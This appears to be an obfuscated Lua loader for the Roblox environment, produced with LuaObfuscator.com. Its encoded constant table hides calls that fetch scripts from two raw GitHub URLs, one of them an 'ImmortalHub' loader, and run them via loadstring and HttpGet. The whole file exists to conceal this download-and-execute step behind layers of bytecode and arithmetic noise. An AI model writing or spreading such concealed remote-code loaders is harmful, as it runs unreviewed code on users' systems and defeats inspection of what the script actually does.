--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v88=v2(v0(v30,16));if v19 then local v109=v5(v88,v19);v19=nil;return v109;else return v88;end end end);local function v20(v31,v32,v33) if v33 then local v89=0 -(1637 -(1523 + 114)) ;local v90;while true do if (v89==0) then v90=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v90-(v90%(928 -(214 + 641 + 72))) ;end end else local v91=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v91 + v91))>=v91) and 1) or (877 -(282 + 595)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + (17 -13) ;return (v40 * (16777333 -(32 + 85))) + (v39 * (64226 + 1310)) + (v38 * (57 + 199)) + v37 ;end local function v24() local v41=0 -0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(3 -2)) then v44=1 -0 ;v45=(v20(v43,1 -0 ,370 -(87 + 263) ) * ((182 -(67 + 113))^(24 + 8))) + v42 ;v41=4 -2 ;end if (v41==3) then if (v46==0) then if (v45==(0 + 0)) then return v47 * (0 -(442 -(416 + 26))) ;else local v120=0 -0 ;while true do if (v120==((409 + 543) -(802 + (265 -115)))) then v46=2 -1 ;v44=0 -0 ;break;end end end elseif (v46==(1490 + 557)) then return ((v45==(997 -((1353 -(145 + 293)) + (512 -(44 + 386))))) and (v47 * ((2 -1)/(0 + (1486 -(998 + 488)))))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((2 -0)^(1239 -(1069 + 118))))) ;end if (v41==0) then v42=v23();v43=v23();v41=2 -1 ;end if (v41==(3 -(1 + 0))) then v46=v20(v43,21,6 + 25 );v47=((v20(v43,(46 + 10) -(796 -(201 + 571)) )==((1139 -(116 + 1022)) + 0)) and  -(792 -(368 + (1760 -1337)))) or (3 -2) ;v41=21 -(10 + 8) ;end end end local function v25(v48) local v49=0 + 0 ;local v50;local v51;while true do if (v49==(2 + 0 + 0)) then v51={};for v110=3 -2 , #v50 do v51[v110]=v2(v1(v3(v50,v110,v110)));end v49=4 -1 ;end if (v49==0) then v50=nil;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=860 -(814 + 45) ;end if (v49==(1424 -(630 + 793))) then v50=v3(v16,v18,(v18 + v48) -((9 -6) -2) );v18=v18 + v48 ;v49=(1751 -(760 + 987)) -2 ;end if (v49==(1 + 2)) then return v6(v51);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99,v100) local v101=(function() return 0 + 0 ;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do if (0==v101) then local v116=(function() return 0;end)();while true do if (v116~=1) then else v101=(function() return 1;end)();break;end if (v116==0) then v92=(function() return 0;end)();v93=(function() return nil;end)();v116=(function() return 242 -(187 + 54) ;end)();end end end if (v101~=(781 -(162 + 618))) then else local v117=(function() return 0 + 0 ;end)();while true do if (v117==0) then while true do if ((0 + 0)~=v92) then else v93=(function() return v94();end)();if (v95(v93, #"!", #"|")~=0) then else local v125=(function() return 0 -0 ;end)();local v126=(function() return;end)();local v127=(function() return;end)();local v128=(function() return;end)();local v129=(function() return;end)();while true do if ((2 -0)==v125) then while true do if (v126~= #"|") then else local v186=(function() return 0;end)();local v187=(function() return;end)();while true do if (v186==(0 + 0)) then v187=(function() return 1636 -(1373 + 263) ;end)();while true do if (v187==1) then v126=(function() return 1002 -(451 + 549) ;end)();break;end if (v187~=(0 + 0)) then else v129=(function() return {v96(),v96(),nil,nil};end)();if (v127==0) then local v200=(function() return 0;end)();local v201=(function() return;end)();while true do if (v200~=0) then else v201=(function() return 0;end)();while true do if (v201~=(0 -0)) then else v129[ #"xxx"]=(function() return v96();end)();v129[ #"asd1"]=(function() return v96();end)();break;end end break;end end elseif (v127== #"|") then v129[ #"91("]=(function() return v97();end)();elseif (v127==2) then v129[ #"xnx"]=(function() return v97() -((1386 -(746 + 638))^(7 + 9)) ;end)();elseif (v127== #"xxx") then local v208=(function() return 0 -0 ;end)();local v209=(function() return;end)();while true do if (v208~=0) then else v209=(function() return 341 -(218 + 123) ;end)();while true do if (v209==(1581 -(1535 + 46))) then v129[ #"91("]=(function() return v97() -((2 + 0)^(3 + 13)) ;end)();v129[ #"0313"]=(function() return v96();end)();break;end end break;end end end v187=(function() return 561 -(306 + 254) ;end)();end end break;end end end if (v126~=(1 + 1)) then else local v188=(function() return 0 -0 ;end)();local v189=(function() return;end)();while true do if (v188~=0) then else v189=(function() return 1467 -(899 + 568) ;end)();while true do if (v189~=0) then else if (v95(v128, #"/", #"[")== #"<") then v129[2]=(function() return v98[v129[2]];end)();end if (v95(v128,2 + 0 ,2)== #"|") then v129[ #"xxx"]=(function() return v98[v129[ #"gha"]];end)();end v189=(function() return 2 -1 ;end)();end if (v189==1) then v126=(function() return  #"nil";end)();break;end end break;end end end if (v126== #"xnx") then if (v95(v128, #"nil", #"19(")~= #"[") then else v129[ #"0836"]=(function() return v98[v129[ #"0836"]];end)();end v99[v100]=(function() return v129;end)();break;end if (v126==0) then local v191=(function() return 603 -(268 + 335) ;end)();local v192=(function() return;end)();while true do if (v191~=(290 -(60 + 230))) then else v192=(function() return 0;end)();while true do if (1==v192) then v126=(function() return  #"}";end)();break;end if (v192==0) then v127=(function() return v95(v93,2, #"xxx");end)();v128=(function() return v95(v93, #"http",578 -(426 + 146) );end)();v192=(function() return 1;end)();end end break;end end end end break;end if (v125~=0) then else local v176=(function() return 0 + 0 ;end)();while true do if (v176==0) then v126=(function() return 1456 -(282 + 1174) ;end)();v127=(function() return nil;end)();v176=(function() return 1;end)();end if (v176~=1) then else v125=(function() return 812 -(569 + 242) ;end)();break;end end end if (v125==1) then local v177=(function() return 0;end)();while true do if (v177==(0 -0)) then v128=(function() return nil;end)();v129=(function() return nil;end)();v177=(function() return 1 + 0 ;end)();end if ((1025 -(706 + 318))==v177) then v125=(function() return 2;end)();break;end end end end end break;end end return v92,v93,v94,v95,v96,v97,v98,v99,v100;end end end end end;end)();local v53=(function() return function(v102,v103,v104) local v105=(function() return 0;end)();local v106=(function() return;end)();while true do if (v105==(1251 -(721 + 530))) then v106=(function() return 0;end)();while true do if (v106~=0) then else local v123=(function() return 1271 -(945 + 326) ;end)();local v124=(function() return;end)();while true do if (v123==0) then v124=(function() return 0;end)();while true do if (v124~=0) then else local v140=(function() return 0;end)();while true do if (v140==(0 -0)) then v102[v103-#">" ]=(function() return v104();end)();return v102,v103,v104;end end end end break;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v67= #"[",v58 do local v68=(function() return 0;end)();local v69=(function() return;end)();local v70=(function() return;end)();local v71=(function() return;end)();while true do if (v68==(701 -(271 + 429))) then v71=(function() return nil;end)();while true do if (1==v69) then if (v70== #"~") then v71=(function() return v21()~=(0 + 0) ;end)();elseif (v70==2) then v71=(function() return v24();end)();elseif (v70~= #"19(") then else v71=(function() return v25();end)();end v59[v67]=(function() return v71;end)();break;end if (v69==(1500 -(1408 + 92))) then local v122=(function() return 1086 -(461 + 625) ;end)();while true do if (v122==(1288 -(993 + 295))) then v70=(function() return v21();end)();v71=(function() return nil;end)();v122=(function() return 1 + 0 ;end)();end if (v122~=(1172 -(418 + 753))) then else v69=(function() return 1 + 0 ;end)();break;end end end end break;end if (v68~=0) then else v69=(function() return 0;end)();v70=(function() return nil;end)();v68=(function() return 1;end)();end end end v57[ #"asd"]=(function() return v21();end)();for v72= #"~",v23() do FlatIdent_31905,Descriptor,v21,v20,v22,v23,v59,v54,v72=(function() return v52(FlatIdent_31905,Descriptor,v21,v20,v22,v23,v59,v54,v72);end)();end for v73= #"{",v23() do v55,v73,v28=(function() return v53(v55,v73,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[1 + 1 ];local v66=v61[1 + 2 ];return function(...) local v74=v64;local v75=v65;local v76=v66;local v77=v27;local v78=1976 -(1913 + 62) ;local v79= -(1 + 0);local v80={};local v81={...};local v82=v12("#",...) -(1770 -(1749 + 20)) ;local v83={};local v84={};for v107=0 + 0 ,v82 do if (v107>=v76) then v80[v107-v76 ]=v81[v107 + ((834 + 489) -(1249 + 73)) ];else v84[v107]=v81[v107 + 1 ];end end local v85=(v82-v76) + 1 + 0 ;local v86;local v87;while true do local v108=1145 -(466 + 679) ;while true do if ((v108==((5 -3) -1)) or (2722<=164)) then if (v87<=(34 -22)) then if (v87<=5) then if ((v87<=(1935 -(565 + 1368))) or (2408<2109)) then if (v87<=((7145 -5245) -(106 + (3455 -(1477 + 184))))) then v84[v86[1 + 1 ]]();elseif (v87==(1 + 0)) then v84[v86[5 -3 ]]=v63[v86[7 -4 ]];else v84[v86[116 -(4 + 110) ]]=v84[v86[587 -(57 + 527) ]][v86[(1949 -518) -(39 + 2 + 1386) ]];end elseif ((v87<=(106 -(17 + 86))) or (33==1455)) then local v130=v86[2 + 0 ];v84[v130](v84[v130 + (1 -(856 -(564 + 292))) ]);elseif (v87>(11 -7)) then v78=v86[169 -(122 + 44) ];else local v146=0 -0 ;local v147;while true do if (v146==(0 -0)) then v147=v86[2];v84[v147]=v84[v147](v13(v84,v147 + 1 + 0 ,v79));break;end end end elseif ((v87<=8) or (443>=4015)) then if (v87<=(1 + 5)) then v84[v86[3 -(1 -0) ]]=v84[v86[68 -(30 + 35) ]][v86[3 + 1 ]];elseif ((3382>166) and (v87==7)) then local v148=v86[2];v84[v148](v84[v148 + (1258 -((3143 -2100) + 214)) ]);else v84[v86[7 -5 ]]=v63[v86[1215 -(323 + 889) ]];end elseif (v87<=(26 -16)) then if ((v87>(589 -(361 + (523 -(244 + 60))))) or (280==3059)) then v84[v86[322 -(53 + 267) ]]=v86[1 + 0 + 2 ];else do return;end end elseif (v87==(424 -(15 + 398))) then do return;end else local v153=0;local v154;local v155;local v156;local v157;while true do if (v153==(983 -(18 + 964))) then v79=(v156 + v154) -(3 -2) ;v157=0 + 0 ;v153=(478 -(41 + 435)) + (1001 -(938 + 63)) ;end if ((1881>1293) and (v153==(852 -(20 + 830)))) then for v193=v154,v79 do v157=v157 + 1 + 0 ;v84[v193]=v155[v157];end break;end if (v153==(126 -(116 + 8 + 2))) then v154=v86[1 + 1 ];v155,v156=v77(v84[v154](v13(v84,v154 + (739 -(542 + 196)) ,v86[6 -3 ])));v153=1 + (1125 -(936 + 189)) ;end end end elseif ((2357==2357) and (v87<=(10 + 8))) then if (v87<=(6 + 3 + 6)) then if (v87<=((1646 -(1565 + 48)) -20)) then if ((123==123) and (v84[v86[4 -2 ]]==v86[4])) then v78=v78 + 1 ;else v78=v86[1554 -(1126 + 425) ];end elseif (v87==(419 -(118 + 287))) then v84[v86[7 -5 ]]=v86[3];else v84[v86[1123 -(118 + 1003) ]]();end elseif (v87<=(46 -30)) then local v133=377 -(88 + 54 + 235) ;local v134;while true do if (v133==(0 -0)) then v134=v86[1 + 1 ];v84[v134]=v84[v134](v13(v84,v134 + 1 ,v79));break;end end elseif ((v87>(994 -(553 + (1562 -(782 + 356))))) or (1056>=3392)) then v84[v86[3 -1 ]]={};else v84[v86[2]]={};end elseif (v87<=21) then if (v87<=(17 + 2)) then local v135=v86[2 + 0 ];local v136=v84[v86[2 + 1 ]];v84[v135 + 1 + (267 -(176 + 91)) ]=v136;v84[v135]=v136[v86[3 + 1 ]];elseif ((v87>((111 -68) -23)) or (1081<1075)) then if (v84[v86[5 -(4 -1) ]]==v86[8 -4 ]) then v78=v78 + 1 + 0 ;else v78=v86[14 -11 ];end else local v163=v86[755 -(239 + (1606 -(975 + 117))) ];local v164=v84[v86[2 + 1 ]];v84[v163 + (1330 -(797 + 532)) ]=v164;v84[v163]=v164[v86[3 + 1 ]];end elseif (v87<=(8 + 15)) then if (v87>((1926 -(157 + 1718)) -29)) then local v168=1202 -(373 + 829) ;local v169;local v170;local v171;local v172;while true do if (v168==(731 -(476 + 207 + 48))) then v169=v86[2];v170,v171=v77(v84[v169](v13(v84,v169 + (1131 -(369 + 761)) ,v86[(6 -4) + 1 ])));v168=1 -0 ;end if ((1 -0)==v168) then v79=(v171 + v169) -(239 -(64 + 174)) ;v172=0 + 0 ;v168=2 -0 ;end if ((338 -(144 + 192))==v168) then for v196=v169,v79 do v172=v172 + 1 ;v84[v196]=v170[v172];end break;end end else v84[v86[218 -(42 + 174) ]]=v86[3 + 0 ]~=(0 + (0 -0)) ;end elseif (v87>(11 + 13)) then v84[v86[1506 -(363 + 1141) ]]=v86[3]~=(1580 -(1183 + 397)) ;else v78=v86[3];end v78=v78 + (2 -1) ;break;end if (v108==0) then v86=v74[v78];v87=v86[1 + 0 ];v108=(1019 -(697 + 321)) + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403443Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F486F6C646572696D616765732F76322F726566732F68656164732F6D61696E2F7632034E3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F663473686E2F492Q6D6F7274616C4875622F726566732F68656164732F6D61696E2F6C6F616465722E6C756103043Q007461736B03043Q0077616974027B14AE47E17A843F001D4Q00127Q00120A000100013Q00260D0001000C000100020004183Q000C0001001208000200033Q001208000300043Q00201300030003000500120A000500064Q000C000300054Q001000023Q00024Q0002000100010004183Q001C000100260D00010002000100010004183Q00020001001208000200033Q001208000300043Q00201300030003000500120A000500074Q0019000600014Q000C000300064Q001000023Q00024Q000200010001001208000200083Q00200600020002000900120A0003000A4Q000700020002000100120A000100023Q0004183Q000200012Q000B3Q00017Q00",v9(),...);
